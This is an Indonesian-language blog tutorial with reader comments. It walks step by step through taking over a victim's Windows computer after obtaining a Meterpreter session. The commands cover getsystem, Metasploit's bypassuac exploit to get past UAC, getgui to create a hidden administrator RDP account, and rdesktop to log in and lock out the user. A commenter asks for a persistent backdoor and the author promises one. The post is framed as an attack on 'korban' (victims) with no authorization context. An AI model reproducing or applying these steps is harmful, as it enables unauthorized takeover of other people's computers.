Mengaktifkan Full Akses Remote Dekstop setelah masuk Meterpreter

Cara menambahkan user administrator dan mengontrol dekstop korban dengan metasploit


Mengaktifkan Remote Dekstop Victim setelah masuk Meterpreter
Saya asumsikan kalian sudah mendapat sesi meterpreter dari system target
Untuk tutorial seputar metasploit bisa baca disini

Gunakan getgui untuk membuat account baru agar bisa melakukan remote dekstop connection
run getgui -u usernamebaru -p passwordnya
Jika muncul pesan Insufficient privileges, itu menunjukkan bahwa kita tidak diperbolehkan untuk menjalankan perintah tersebut. Jadi kita harus terlebih dahulu mendapatkankan hak administrator dalam sistem tersebut.

Untuk mendapatkan hak administrator bisa gunakan perintah
getsystem

 Apabila muncul pesan seperti berikut
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
Itu karena UAC (User Account Control System) target sedang aktif. Namun jangan khawatir, metasploit memiliki module exploit untuk melakukan bypass UAC.
Sebelum menggunakan module exploit tersebut, kita harus berjalan sebagai background terlebih dahulu
background

Lalu gunakan module exploit exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac
show options
set session 1 (sessions yang sebelumnya di dapatkan)

Lalu kembali jalankan exploitnya
exploit

Seharusnya setelah melakukan bypass UAC kalian sudah mendapatkan hak administrator system
getsystem

Coba jalankan getgui kembali untuk membuat account Remote Desktop Cennection
run getgui -u usernamebaru -p passwordnya
Account RDP dengan full administrator berhasil dibuat :). Lanjut ke langkah berikutnya

Untuk melakukan remote dekstop bisa gunakan perintah
rdesktop -u username -p password IP iptarget

 kwwk ternyata komputer masih digunakan sama si korban :v, pilih yes untuk lock off.

Tunggu beberapa saat

Sukses bro :D. Sudah berhasil login, sekarang kita dapat mengoperasikan komputer korban dengan mouse dan keyboard kita sendiri.

7 Obrolan Seru di Artikel "Mengaktifkan Full Akses Remote Dekstop setelah masuk Meterpreter"

  1. Makasih gan informasinya, sangat membantu

    ReplyDelete
  2. terimakasih gan infonya, saya coba

    ReplyDelete
  3. update juga dong bro, cara nya supaya backdoor tertanam permanen di victimnya. Jadi tiap pc korban connect (ganti ip) otomatis kebuka meterpreternya :)

    ReplyDelete
    Replies
    1. Thanks masukannya :D, tutorial menyusul yak ;)

      Delete

Dilarang mencantumkan Link aktif di komentar ya :)
Berkomentarlah secara relevan sesuai konten
No SPAM, no SARA :)